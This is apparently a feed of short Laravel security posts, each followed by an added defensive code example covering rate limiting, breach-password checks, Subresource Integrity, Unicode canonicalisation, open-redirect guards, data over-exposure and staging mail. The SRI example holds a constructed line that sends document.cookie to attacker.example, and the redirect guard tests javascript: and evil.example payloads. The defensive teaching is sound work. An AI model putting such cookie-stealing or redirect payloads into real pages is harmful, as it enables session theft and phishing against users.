Does your login form rate limit requests, or does it let an attacker make as many as they want? 🔓 You need rate limiting to slow down and hinder brute-force and credential stuffing...
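As an added example (not code from the post above), this is how a Laravel login form gets a named rate limiter that keys on both the submitted account and the source IP. The limiter name `login`, the `email` field and `LoginController` are assumptions; the `RateLimiter`, `Limit` and `throttle:` pieces are standard Laravel 8+.

```php
<?php
// Added example (not from the original post). Laravel 8+ named rate limiter for a login
// form. The limiter name, the controller and the "email" field name are assumptions.

use App\Http\Controllers\LoginController; // hypothetical controller
use Illuminate\Cache\RateLimiting\Limit;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\RateLimiter;
use Illuminate\Support\Facades\Route;
use Illuminate\Support\Str;

// 1. In a service provider's boot(): define the limiter. Returning an array applies every
//    limit; the request is rejected as soon as any one of them is exceeded.
RateLimiter::for('login', function (Request $request) {
    // Lower-case the identifier so "Bob@Example.com" and "bob@example.com" share a bucket.
    $identifier = Str::lower(trim((string) $request->input('email')));

    return [
        // Per account + source IP: stops a brute-force against one account from one host.
        Limit::perMinute(5)->by($identifier.'|'.$request->ip()),

        // Per source IP regardless of account: slows credential stuffing, where every
        // attempt uses a different username and would never trip the limit above.
        Limit::perMinute(30)->by($request->ip())
            ->response(function (Request $request, array $headers) {
                return response('Too many login attempts. Try again shortly.', 429, $headers);
            }),
    ];
});

// 2. In routes/web.php: attach it to the POST route only. Throttling the GET form is
//    pointless; the login attempt is what costs the attacker.
Route::post('/login', [LoginController::class, 'store'])->middleware('throttle:login');
```

Two checks before trusting this: make sure your `TrustProxies` middleware is configured if the app sits behind a load balancer, otherwise `$request->ip()` is the proxy's address and the per-IP limit throttles every user at once; and remember the limiter keys on the literal string it is given, so the identifier should be normalised the same way your lookup query treats it.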
Should You Block Compromised Passwords? Blocking pwned passwords @haveibeenpwned is great, but you can't simply drop in `->uncompromised()` and call it a day when you have non-technical users....
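The following is an added example, not the post's own code, showing the breach check configured once via `Password::defaults()` and the user-facing message reworded for people who do not know what a "data leak" is. It assumes Laravel 9+ (where the message lives under `validation.password.uncompromised`) and Laravel's stock HIBP k-anonymity verifier; the wording and the minimum length are assumptions.

```php
<?php
// Added example (not from the original post). Laravel 9+ Password rule with the breach check,
// defined once and given a message a non-technical user can act on.

use Illuminate\Support\Facades\Validator;
use Illuminate\Validation\Rules\Password;

// app/Providers/AppServiceProvider.php, in boot(): one policy shared by registration,
// password reset and change-password forms, so no form is left without the check.
Password::defaults(function () {
    return Password::min(12)
        // Reject passwords seen in known breaches. threshold = number of breach
        // appearances tolerated; 0 means "any appearance at all".
        ->uncompromised(threshold: 0);
});

// lang/en/validation.php: override the stock "has appeared in a data leak" line.
// (Shown here as a comment; it belongs in the returned array of that file.)
//
//   'password' => [
//       'uncompromised' => 'That password has been found in a published list of stolen '
//           .'passwords, so anyone could guess it. Please choose a different one that you '
//           .'have not used on any other site.',
//   ],

// Usage in a controller or form request: Password::defaults() expands to the policy above.
$validator = Validator::make($input, [
    'password' => ['required', 'confirmed', Password::defaults()],
]);

if ($validator->fails()) {
    // The message above is what the user sees next to the field.
    $errors = $validator->errors()->get('password');
}
```

Apply the rule where a password is chosen (registration, reset, change), not at login: a user whose existing password has since leaked should be steered to change it, not locked out of the account with no explanation. Also note that Laravel's verifier reports an exception and treats the password as not compromised if the HIBP API cannot be reached, so an outage silently disables the check; decide whether that is acceptable for your users.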
The long awaited Missing Authorisation module for Practical Laravel Security is now LIVE! 🎉 This module covers IDORs, broken crypto, exposed routes, and related records, and includes 6 challenges to...
How much do you trust the 3rd-party scripts included on your site? Would you know if they changed and a malicious script was added? Subresource Integrity solves this problem by defining a safe version...
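An added example (not from the post) of generating a Subresource Integrity value with PHP built-ins, emitting the tag, and mirroring the browser's check so a deploy test can tell whether the CDN still serves the bytes you pinned. The script contents and CDN URL are constructed samples.

```php
<?php
// Added example (not from the original post): Subresource Integrity with PHP built-ins only.
// The script body and the CDN URL below are constructed samples.

// The integrity attribute is "<algorithm>-<base64(raw digest)>"; browsers accept sha256,
// sha384 and sha512. Compute it from the exact bytes you reviewed and intend to allow.
function sriHash(string $contents, string $algo = 'sha384'): string
{
    return $algo.'-'.base64_encode(hash($algo, $contents, true));
}

// Emit the tag. crossorigin="anonymous" is mandatory for a cross-origin script: without
// CORS the browser cannot read the response bytes to verify them, and refuses to run it.
function sriScriptTag(string $src, string $contents): string
{
    return sprintf(
        '<script src="%s" integrity="%s" crossorigin="anonymous"></script>',
        htmlspecialchars($src, ENT_QUOTES, 'UTF-8'),
        sriHash($contents)
    );
}

// Mirror of the browser's check: do the bytes served today still match what was pinned?
function sriMatches(string $integrity, string $servedBytes): bool
{
    [$algo, $expected] = explode('-', $integrity, 2);

    return hash_equals($expected, base64_encode(hash($algo, $servedBytes, true)));
}

// Constructed: the file as you reviewed it, and the same file with a line appended.
$reviewed = "window.vendor = {version: '1.4.2'};\n";
$tampered = $reviewed."fetch('https://attacker.example/?c='+document.cookie);\n";

echo sriScriptTag('https://cdn.example.com/vendor-1.4.2.js', $reviewed), PHP_EOL;

$integrity = sriHash($reviewed);
var_dump(sriMatches($integrity, $reviewed));   // unchanged file: the browser runs it
var_dump(sriMatches($integrity, $tampered));   // any byte changed: the browser refuses it
```

Pin to a versioned URL, never a "latest" path: because any change to the bytes, even whitespace, breaks the hash, a CDN that rolls forward under a fixed URL will take your page down rather than protect it. Pair the attribute with a `require-sri-for`-style policy or CSP reporting so a blocked script is noticed rather than silently missing.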
#Substack popped up a NPS score feedback box for "bestsellers" (>100 paid subs), and I may have written a small essay on why I'm leaving soon and why blocking Nazis would be cheaper than their...
How secure is your staging site? Staging is often buggy, full of vulnerabilities and debugging tools, and an easy gateway into your production environment. Make sure you protect it! [$]...
Ⓣⓡⓐⓝⓢⓛⓘⓣⓔⓡⓐⓣⓘⓞⓝ is a sneaky trick that can be used to bypass rate limiting, blocklists, existence checks, and more, by taking advantage of your database's "helpful"...
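The following added example (not the post's code) shows the defensive half of this: canonicalise an identifier before it becomes a rate-limit key, blocklist entry or existence check, so look-alike spellings collapse to one value. It assumes PHP's intl (`Normalizer`) and mbstring extensions, and it assumes the "helpful" database behaviour the post refers to is an accent- and case-insensitive collation (such as MySQL's `*_ci` collations) that already treats these spellings as equal when it looks the row up.

```php
<?php
// Added example (not from the original post): collapse "look-alike" Unicode spellings of an
// identifier into one canonical form. Requires the intl and mbstring extensions. The claim
// about *_ci database collations matching these spellings is an assumption stated in the text.

function canonicalIdentifier(string $raw): string
{
    // NFKD: compatibility-decompose. Circled (ⓐ), fullwidth (ａ), superscript and ligature
    // forms become their base letters; accented letters become base letter + combining mark.
    $decomposed = Normalizer::normalize(trim($raw), Normalizer::FORM_KD);
    if ($decomposed === false) {
        throw new InvalidArgumentException('identifier is not valid UTF-8');
    }

    // Strip combining marks ("é" -> "e"), matching what an accent-insensitive collation
    // does when it compares two values.
    $stripped = preg_replace('/\p{Mn}+/u', '', $decomposed);

    // Recompose whatever is left and fold case.
    return mb_strtolower(Normalizer::normalize($stripped, Normalizer::FORM_C), 'UTF-8');
}

// Constructed attempts. A naive string-keyed limiter or blocklist counts each one
// separately; the lookup query (under an accent/case-insensitive collation) does not.
$attempts = [
    'admin@example.com',
    'Admin@Example.com',
    'ⓐⓓⓜⓘⓝ@example.com',   // circled letters
    'ａｄｍｉｎ@example.com',  // fullwidth letters
    'ádmïn@example.com',     // accented letters
];

$buckets = [];
foreach ($attempts as $attempt) {
    $buckets[canonicalIdentifier($attempt)][] = $attempt;
}

foreach ($buckets as $key => $spellings) {
    printf("%s <- %s\n", $key, implode(', ', $spellings));
}
```

All five constructed spellings end up under the single key `admin@example.com`. Use that key (not the raw input) for the throttle, the blocklist and the "does this user already exist?" query, and fix the other side too: for columns that must be compared exactly, use a binary or accent- and case-sensitive collation, or enforce uniqueness on a stored canonical copy of the value.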
One of the cool things about doing security audits is interactions like these. I found a sneaky and obscure edge case in a really cool security feature my client built to solve a massive security risk...
While it may be tempting to use a query parameter to trigger a redirect after a form submission, or even via a GET, you're most likely leaving an Open Redirect, just waiting for someone to exploit...
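As an added example (not from the post), here is a guard that only honours same-origin, path-relative targets from a redirect parameter, with the bypass shapes that usually slip past a naive check. It is plain PHP; the parameter name and the `/dashboard` fallback are assumptions.

```php
<?php
// Added example (not from the original post): accept only same-origin, path-relative
// redirect targets. The fallback and the parameter name are assumptions.

function safeRedirectTarget(?string $candidate, string $fallback = '/dashboard'): string
{
    if ($candidate === null) {
        return $fallback;
    }

    // Browsers strip tabs and newlines inside a URL before parsing it, so "java\tscript:"
    // survives a naive scheme check. Reject any control character outright.
    if (preg_match('/[\x00-\x1F\x7F]/', $candidate)) {
        return $fallback;
    }

    $candidate = trim($candidate);

    // Must be an absolute path on this origin: exactly one leading slash.
    // "//evil.example" is a protocol-relative URL, and browsers treat "/\evil.example"
    // the same way, so a second slash or a backslash is rejected too.
    if (! preg_match('#^/(?![/\\\\])#', $candidate)) {
        return $fallback;
    }

    // Belt and braces: anything PHP parses as carrying a scheme or host is not a path.
    $parts = parse_url($candidate);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $fallback;
    }

    return $candidate;
}

// Constructed inputs, including the shapes attackers actually try.
$samples = [
    '/account/settings',                  // allowed
    '/account/settings?tab=billing#top',  // allowed
    'https://evil.example/phish',         // absolute URL
    '//evil.example/phish',               // protocol-relative
    '/\\evil.example/phish',              // backslash variant
    "java\tscript:alert(1)",              // tab-split scheme
    'javascript:alert(1)',
    'account/settings',                   // relative, not anchored to the origin
    '',
];

foreach ($samples as $sample) {
    printf("%-40s -> %s\n", json_encode($sample), safeRedirectTarget($sample));
}
```

In Laravel the better answer is usually to avoid the parameter altogether: `redirect()->intended('/dashboard')` uses the URL the `auth` middleware stored in the session, which the user cannot tamper with. If a parameter is unavoidable, either run it through a guard like the one above or map a short allowlisted key to a named route instead of accepting a URL.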
This is your periodic reminder that you shouldn't hardcode admin accounts in your code! ⚠️ You'll end up forgetting to update the list when an admin leaves (or is fired), and someone with malicious...
This is your periodic reminder to keep your dependencies updated. `composer outdated` and `composer audit` are your friends!...
Anyone else having issues uploading images to phpc.social in the PWA on Android? The image uploads and then errors out with: "500 Error processing thumbnail for uploaded media" @ramsey@phpc
My wife found this for me at the library... Not quite sure what message she's trying to give me... 🤔
Is your API or SPA leaking sensitive data? Check what data your app sends to the browser or returns in an API. You may be surprised just how much you're accidentally sharing... (Hint: Usually more than...
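An added example (not from the post) of the two Laravel mechanisms that stop accidental over-sharing: a model-level denylist for columns that must never serialise, and an API Resource that is an explicit allowlist of what one endpoint returns. The model, its columns and the resource are hypothetical; the APIs used are standard Laravel 10.

```php
<?php
// Added example (not from the original post). Two layers against leaking model data:
// $hidden on the model (denylist) and a JsonResource (allowlist). Model, columns and
// resource names are hypothetical.

namespace App\Models {
    use Illuminate\Database\Eloquent\Model;

    class User extends Model
    {
        // Never appears in toArray()/toJson(), so `return $user;` from a controller or
        // `@json($user)` in Blade cannot leak these by accident.
        protected $hidden = ['password', 'remember_token', 'two_factor_secret', 'api_token'];
    }
}

namespace App\Http\Resources {
    use Illuminate\Http\Request;
    use Illuminate\Http\Resources\Json\JsonResource;

    class UserResource extends JsonResource
    {
        // Allowlist: only what this endpoint's consumer needs. A column added to the
        // table next year stays private until someone deliberately lists it here.
        public function toArray(Request $request): array
        {
            return [
                'id'    => $this->id,
                'name'  => $this->name,
                // Conditionally included: only the account owner gets their own email back.
                'email' => $this->when(
                    $request->user()?->is($this->resource),
                    $this->email
                ),
            ];
        }
    }
}

namespace App\Http\Controllers {
    use App\Http\Resources\UserResource;
    use App\Models\User;

    class UserController
    {
        // Leaky: serialises every non-hidden column, relations included if they were loaded.
        public function showLeaky(User $user)
        {
            return $user;
        }

        // Tight: the resource decides the shape.
        public function show(User $user)
        {
            return new UserResource($user);
        }
    }
}
```

`$hidden` is the safety net, not the design: it only protects the columns you remembered to list, while a resource protects everything you did not. To audit what actually leaves the app, hit each endpoint as a low-privilege user and read the raw JSON (and the data your SPA bundle receives on page load) rather than trusting what the UI displays.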
Open your IDE and do a search for "md5(" and "rand(". There is a very good chance you'll have either (or both) hiding somewhere, serving some purpose that's supposed to be secure, but really isn't!...
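An added example (not the post's code) of what those search hits usually turn out to be doing, each beside its correct replacement. Plain PHP 7.1+; function names are hypothetical.

```php
<?php
// Added example (not from the original post): typical "md5(" / "rand(" hits beside their
// fixes. Plain PHP 7.1+ (random_int, random_bytes). Function names are hypothetical.

// --- Reset / API tokens ---------------------------------------------------------
// Weak: rand() has been an alias of mt_rand() since PHP 7.1 (libc rand() before that).
// Its output is predictable from a few observed values, and md5 adds no secrecy,
// only 32 hex characters of apparent randomness.
function weakToken(): string
{
    return md5((string) rand());
}

// Fix: 32 bytes from the OS CSPRNG (256 bits of entropy).
function secureToken(): string
{
    return bin2hex(random_bytes(32));
}

// Store only a hash of the token, so a dumped table does not yield usable tokens.
// The token is already high-entropy, so a fast hash is appropriate here.
function tokenStorageHash(string $token): string
{
    return hash('sha256', $token);
}

// --- One-time codes ---------------------------------------------------------------
// Weak: rand(0, 999999) has the same predictability problem.
// Fix: random_int is uniformly distributed and cryptographically secure.
function oneTimeCode(): string
{
    return str_pad((string) random_int(0, 999999), 6, '0', STR_PAD_LEFT);
}

// --- Passwords -------------------------------------------------------------------
// Weak: unsalted md5 is computed at billions of guesses per second on a GPU and is
// covered by precomputed tables.
function weakPasswordHash(string $password): string
{
    return md5($password);
}

// Fix: password_hash picks a slow, salted algorithm (bcrypt under PASSWORD_DEFAULT today,
// upgradeable later); password_verify does the comparison.
function securePasswordHash(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

function passwordMatches(string $password, string $storedHash): bool
{
    return password_verify($password, $storedHash);
}

// --- Comparing secrets -------------------------------------------------------------
// Weak: `$submitted === $stored` stops at the first differing byte.
// Fix: hash_equals compares in constant time.
function tokenMatches(string $submittedToken, string $storedHash): bool
{
    return hash_equals($storedHash, tokenStorageHash($submittedToken));
}

// Not every hit is a bug: md5() as a cache key or ETag, or rand() to pick a placeholder
// colour, is fine. The question at each hit is "does anything security-relevant depend
// on this being unpredictable or irreversible?"
```

While you have the search open, add `sha1(`, `uniqid(`, `mt_rand(` and `str_shuffle(` to the list; they turn up in the same roles with the same problems.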
When you reach for helpers, particularly the Auth helpers, make sure you understand the side-effects... Spoiler: Don't use `Auth::loginUsingId()` on a single guest...
Loving this small visual tweak to Practical Laravel Security before I dive into writing out the Missing Authorisation defence modules. 😁 Still need to break the challenges into their own pages, but this...
It's been a while since I've seen an accidental emails-from-staging broadcast, and let's keep it that way: Make sure your staging envs don't send out live emails!...
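An added example (not from the post) of belt-and-braces protection for a Laravel staging environment: a non-sending mailer in the environment file, plus a service-provider guard that redirects every message to one internal inbox even if someone later points staging at a real SMTP server. It uses Laravel's `Mail` facade; the sink address is hypothetical.

```php
<?php
// Added example (not from the original post): keep staging from emailing real people.
// Uses Laravel's Mail facade; the sink address is hypothetical.

// Layer 1: the staging host's .env. Never hand staging real SMTP credentials.
//
//   MAIL_MAILER=log      # each message is written to the log instead of sent
//   # or: MAIL_MAILER=array   # kept in memory only (what the test suite uses)

// Layer 2: app/Providers/AppServiceProvider.php. Even if the mailer is flipped to smtp
// on staging, every outgoing message is delivered to one internal inbox.
namespace App\Providers;

use Illuminate\Support\Facades\Mail;
use Illuminate\Support\ServiceProvider;

class AppServiceProvider extends ServiceProvider
{
    public function boot(): void
    {
        if (! $this->app->environment('production')) {
            // Overrides To, Cc and Bcc on every message sent through the default mailer,
            // so a seeded copy of the production users table cannot be mailed by mistake.
            Mail::alwaysTo('staging-mail-sink@example.test');
        }
    }
}
```

The same redirect can be declared in `config/mail.php` via its `to` key rather than in code. Whichever you use, also check the things that bypass the mailer: queued jobs still holding production credentials, third-party notification channels (SMS, push, Slack) that have their own API keys, and scheduled commands that run on staging against copied production data.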
When you're validating your user input, don't forget about the HTML from WYSIWYG and markup editors, and good old Markdown... It's easy to sneak XSS into those if you're not validating or filtering...
If you're using parent-child model route bindings, check out `scopeBindings()`! It'll ensure any child models are loaded from the parent scope, preventing sneaky authorisation bypassing through...
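As an added example (not from the post), here is a `routes/web.php` fragment showing the unscoped binding beside the scoped one, plus the group form. It assumes a `User` model with a `posts()` has-many relation to `Post` (and `Post` with `comments()` to `Comment`), Laravel 9+ for `Route::scopeBindings()->group()`, and hypothetical controllers.

```php
<?php
// Added example (not from the original post): routes/web.php before and after scopeBindings().
// Assumes User hasMany Post via posts() and Post hasMany Comment via comments(); Laravel 9+
// for the group form. Controllers are hypothetical.

use App\Http\Controllers\CommentController;
use App\Http\Controllers\PostController;
use Illuminate\Support\Facades\Route;

// Before: {user} and {post} are resolved independently, each with findOrFail() on its own
// table. GET /users/7/posts/1234 returns post 1234 even if it belongs to user 99, and any
// controller code that assumes "$post came in under $user" is now an IDOR.
//
// Route::get('/users/{user}/posts/{post}', [PostController::class, 'show']);

// After: {post} is resolved through the parent's relation, inferred from the parameter
// name ("post" -> posts()). A post that is not the given user's yields a 404 before the
// controller runs.
Route::get('/users/{user}/posts/{post}', [PostController::class, 'show'])
    ->scopeBindings();

// Apply it to every nested route in a group rather than remembering it per route.
// Scoping chains: {comment} is looked up through $post->comments(), and {post} through
// $user->posts().
Route::scopeBindings()->group(function () {
    Route::delete('/users/{user}/posts/{post}', [PostController::class, 'destroy']);
    Route::get('/users/{user}/posts/{post}/comments/{comment}', [CommentController::class, 'show']);
});
```

A quick way to audit an existing app: list every route with two or more model parameters (`php artisan route:list` makes them easy to spot) and confirm each is either scoped or has a controller that checks the relationship itself. Scoping only guards the relationship between the parameters; it does not replace a policy check that the current user may act on the parent at all.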